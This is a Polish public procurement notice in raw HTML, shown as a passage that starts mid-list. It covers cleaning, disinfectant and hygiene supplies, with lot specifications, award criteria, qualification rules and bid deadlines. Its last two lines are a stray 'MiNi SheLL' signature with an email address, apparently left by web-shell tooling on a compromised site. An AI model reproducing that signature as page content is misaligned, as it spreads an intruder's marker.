pielęgnuje<br/>•	dzięki Nano – technologii, zabezpiecza powierzchnię przed ponownym osadzaniem się brudu i zaparowywaniem<br/>•	nie pozostawia smug i zacieków<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>10)	Płyn do pielęgnacji mebli typu Dolphin w ilości 100 litrów<br/>•	skutecznie myje i pielęgnuje wodoodporne meble, regały, stolarkę drzwiową, okienną i ścienną, a także ceramikę oraz powierzchnie wykonane z tworzyw sztucznych <br/>•	zabezpiecza powierzchnie przed ponownym osadzaniem się uporczywego brudu<br/>•	szybko odparowuje z powierzchni, nie pozostawiając smug i zacieków<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>11)	Płyn do mycia i dezynfekcji toalet typu Dolphin w ilości 200 litrów<br/>•	przeznaczenie: muszle klozetowe, pisuary, bidety, umywalki, wanny, kabiny prysznicowe, brodziki<br/>•	powierzchnie: terakota, glazura, kamień, gres, lastryko, beton, klinkier, pcv, tworzywa sztuczne, ceramika, akryl, powierzchnie emaliowane, metalowe i chromowane<br/>•	właściwości płynu: czyszczące, myjące, dezynfekujące<br/>•	dzięki zawartości chloru produkt skutecznie usuwa zanieczyszczenia pochodzenia organicznego, eliminując przykre zapachy. idealnie sprawdza się do czyszczenia i wybielania : muszli klozetowych, pisuarów, wanien, umywalek, brodzików, zlewów, odpływów, koszy i pojemników na odpady. usuwa przebarwienia wywołane obecnością grzybów. w stanie nierozcieńczonym, płyn usuwa pleśń i czarne przebarwienia pod silikonem, skutecznie czyści fugi i powierzchnie wrażliwe na działanie kwasów.<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>12)	Tabletki/kapsułki do zmywarki typu Finish w ilości 1000 sztuk<br/>•	bez wstępnego namaczania<br/>•	usuwają trudne oraz zaschnięte zabrudzenia nawet po 24h<br/>•	eliminują osadzony tłuszcz<br/>•	chronią naczynia i delikatne srebro<br/>•	działają w niskich temperaturach<br/><br/>13)	Preparat do czyszczenia fug typu ENZIM E435 w ilości 15 litrów<br/>•	preparat do gruntownego czyszczenia fug <br/>•	Rozpuszcza trudne do usunięcia zabrudzenia, bez konieczności szorowania<br/>•	szybkie i samoczynne usuwanie nierozpuszczalnych w wodzie zabrudzeń, takich jak: zaprawa wapienna, rdza, osady wapniowe, kamień moczowy itp.<br/>•	w opakowaniach od 1 do 5 litrów<br/><br/>14)	Wkładka żelowa zapachowa do pisuaru w ilości 50 sztuk <br/>•	zwalcza nieprzyjemny zapach i utrzymuj higienę w męskiej toalecie.<br/><br/>15)	Gąbka zmywak w ilości 300 sztuk<br/>•	minimalne wymiary 8x5 cm<br/><br/>16)	Ręcznik papierowy celulozowy biały w ilości 40 sztuk<br/>•	ilość warstw minimum: 2 warstwy, długość minimum: 100 metrów <br/><br/>17)	Ściereczka domowa w ilości 300 sztuk<br/>•	wymiary minimalne 35x35 cm, 70% wiskoza <br/><br/>18)	Druciak czyścik spiralny z rączką w ilości 100 sztuk<br/><br/>19)	Druciak czyścik spiralny bez rączki w ilości 200 sztuk <br/><br/>20)	Ręcznik papierowy ZZ w ilości 300 opakowań<br/>•	w opk. 20 opk. biała celuloza, minimum 2 warstwy, minimum 3 000 listków </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39800000-0 - Środki czyszczące i polerujące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39200000-4 - Wyposażenie domowe</p> <p class="mb-0">33631600-8 - Środki antyseptyczne i dezynfekcyjne</p> <p class="mb-0">33760000-5 - Papier toaletowy, chusteczki higieniczne, ręczniki do rąk i serwety</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-07-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie do realizacji zamówienia osób społecznie marginalizowanych o których mowa w art. 94 ust. 1 pkt 5 Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Preparat dezynfekcyjny na bazie stabilizowanego, aktywnego chloru ( NaDCC ) w postaci tabletek typu SUMA Tab D4 w ilości 24 000 tabletek.<br/>	szerokie spektrum skuteczności mikrobiologicznej,<br/>	bezpieczny dla wszelkich powierzchni, także aluminiowych, skuteczny w niskich temperaturach i krótkim czasie działania,<br/>	skuteczny w obecności zanieczyszczeń organicznych,<br/>	może być stosowany do dezaktywacji rozlanej krwi i innych wydzielin i wydalin,<br/>	zastosowanie do dezynfekcji kaczek, basenów i sprzętu jednorazowego,<br/>	możliwość stosowania do dezynfekcji przedmiotów mających kontakt z żywnością,<br/>	właściwości wybielające i dezodorujące,<br/>	nadaje się do dezynfekcji powierzchni w pomieszczeniach sanitarnych (sanitariaty, kratki ściekowe, zlewy).<br/><br/>2)	Skoncentrowany środek przeznaczony do usuwania osadów z kamienia wapiennego z powierzchni kwasoodpornych typu Taski Sani CALC W3b w ilości 70 litrów<br/>•	usuwa osady wapienne szybko i skutecznie<br/>•	zawiera inhibitory korozji<br/>•	bezpieczny dla powierzchni (nie wykazuje agresywności chemicznej).<br/>•	opakowania o pojemności od 1 do 5 litrów<br/><br/>3)	Skoncentrowany preparat przeznaczony do mycia i dezynfekowania typu CIF PRO FORMULA KITCHEN CLEANER DISINFECTANT w ilości 40 litrów<br/>•	posiada właściwości bakteriobójcze i grzybobójcze przeciw grzybom drożdżopodobnym<br/>•	jest produktem polecanym do mycia i dezynfekcji powierzchni i urządzeń mających jak i nie mających bezpośredniego kontaktu z żywnością.<br/>•	skutecznie usuwa różne zabrudzenia tłuszczowe oraz zaschnięte resztki żywności.<br/>•	jest bezpieczny dla większości materiałów z których wykonane są powierzchnie i urządzenia używane w kuchniach profesjonalnych.<br/>•	opakowania o pojemności od 1 do 5 litrów<br/><br/>4)	Preparat do czyszczenia piekarników i frytkownic typu Suma Grill D9 w ilości 60 litrów<br/>•	skutecznie usuwa zwęglone osady i tłuszcze;<br/>•	idealny do stosowania w piekarnikach, grillach i smażalniach;<br/>•	szybki efekt mycia.<br/>•	opakowania o pojemności od 1 do 5 litrów<br/><br/>5)	Żel do dezynfekcji rąk typu Soft Care Med w ilości 50 litrów<br/>•	szerokie spektrum bójcze<br/>•	jest dobrze tolerowany przez skórę rąk<br/>•	zawiera substancje nawilżające<br/>•	brak szkodliwych pozostałości na rękach, nie ma potrzeby płukania rąk po użyciu żelu<br/>•	wykazuje działanie natychmiastowe i przedłużone (do ponad 3 godzin)<br/>•	opakowania o pojemności od 0,5 do 5 litrów<br/><br/>6)	Preparat do polerowania i zabezpieczania stali nierdzewnej typu Suma Inox Classic D7 w ilości 40 litrów<br/>•	preparat ma postać oliwki.<br/>•	nadaje połysk wypolerowanym urządzeniom, pozostawia warstwę ochronną oraz zabezpiecza powierzchnie przed plamami z tłuszczu, wody<br/>•	przeznaczony do takich powierzchni jak obudowy zmywarek, okapy, drzwiczki szafek, lodówek, zamrażarek; utrzymuje się na pionowych powierzchniach, nie spływa<br/>•	opakowania o pojemności od 0,75 do 5 litrów<br/>7)	Preparat do dezynfekcji narzędzi medyczno-chirurgicznych typu ANIOSYME X3 w ilości 5 litrów<br/>•	neutralne ph: kompatybilne ze stopami metali<br/>•	formuła nie zawierająca chlorków: nie powoduje korozji materiałów<br/>•	może być stosowany w myjkach ultradźwiękowych<br/>•	opakowania o pojemności od 1 do 5 litrów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39800000-0 - Środki czyszczące i polerujące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-07-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie do realizacji zamówienia osób społecznie marginalizowanych o których mowa w art. 94 ust. 1 pkt 5 Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 1) nie podlegają wykluczeniu; 2) spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu o zamówieniu i niniejszej SWZ. 2. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunku określonego w art. 112 ust. 2 ustawy Pzp, dotyczącego: 1) zdolności do występowania w obrocie gospodarczym, oświadczenie wykonawcy 2) uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów oświadczenie wykonawcy 3) sytuacji ekonomicznej lub finansowej, Zamawiający nie stawia szczegółowych warunków w tym zakresie 4) zdolności technicznej lub zawodowej, Zamawiający nie stawia szczegółowych warunków w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których stanowi art. 108 ust. 1 i art. 109 ust. 1 pkt 4 ustawy Pzp, oraz w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego wykonawca składa do oferty oświadczenie o niepodleganiu wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający może wezwać wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających: 1) spełnianie warunków udziału w postępowaniu: odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; 2) brak podstaw wykluczenia: a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego. b) oświadczenia wykonawcy o braku przynależności do tej samej grupy kapitałowej, z innym wykonawcą, który złożył odrębną ofertę – załącznik nr 4 do SWZ 3) 2. Zamawiający nie wezwie wykonawcy do złożenia podmiotowych środków dowodowych, jeżeli: 1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17.2.2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, dane umożliwiające dostęp do tych środków; 2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1 Pzp. 3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. 4. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia. 5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta - załącznik nr 1 do SWZ, ewentualnie pełnomocnictwa jeśli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna). W tym przypadku ustanawiają pełnomocnika do reprezentowania mocodawców w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego. 2) Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem. 3) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie. 4) Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań. 5) Na ofertę wykonawców wspólnie ubiegających się o zamówienie składają się dokumenty: a) pełnomocnictwo, o którym mowa w art. 58 ust. 2 ustawy Pzp, które zawiera m.in.: nazwy i adresy członków, nazwę i adres pełnomocnika, zakres pełnomocnictwa, datę udzielenia pełnomocnictwa oraz podpisy przedstawicieli członków, zgodnie z zasadami reprezentacji; b) oświadczenia wyszczególnione w ust. 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. 6) Jeżeli oferta wykonawców zostanie wybrana jako najkorzystniejsza, Zamawiający przed zawarciem umowy w sprawie zamówienia publicznego będzie żądać umowy regulującej współpracę tych wykonawców 7) W przypadku wskazania przez wykonawcę w oświadczeniu (załącznik nr 2), dostępności podmiotowych środków dowodowych, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz danych podmiotowe środki dowodowe. 8) Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 9) W przypadku wątpliwości interpretacyjnych dotyczących rodzajów dokumentów oraz formy ich składania w niniejszym postępowaniu rozstrzygającym jest rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może nastąpić wyłącznie na podstawie art. 454 i art. 455 ustawy Pzp. 2. Zamawiający na podstawie art. 455 ust. 1 pkt. 1 ustawy Pzp, przewiduje możliwość dokonania zmian wynagrodzenia (ceny) niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, o kwotę wynikającą ze zmienionych stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy. 3. Zmiany umowy określone w ust. 1<br/>będą dokonane w formie pisemnej w postaci aneksu pod rygorem nieważności. W odniesieniu do przypadków określonych w ust. 1, zajście zdarzeń powodujących zmiany musi być uprawdopodobnione przez Stronę wywodzącą z przedmiotowego zdarzenia skutki prawne. 4. Zamawiający ma prawo odstąpienia od umowy na podstawie art. 456 ustawy Pzp oraz jej unieważnienia zgodnie z art. 457 ustawy Pzp. W umowie do zadania nr 1 - Na podstawie art. 439 ust. 1 i 2 ustawy Strony mogą wystąpić z wnioskiem o waloryzacje wynagrodzenia należnego wykonawcy w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia. Waloryzacja będzie polegała na podwyższeniu albo obniżeniu każdej z cen jednostkowych podanych w Formularzu ofertowym na zasadach opisanych w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na stronie prowadzonego postępowania, tj. Platformie Zakupowej Open Nexus Sp. z o. o. https://platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-12 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com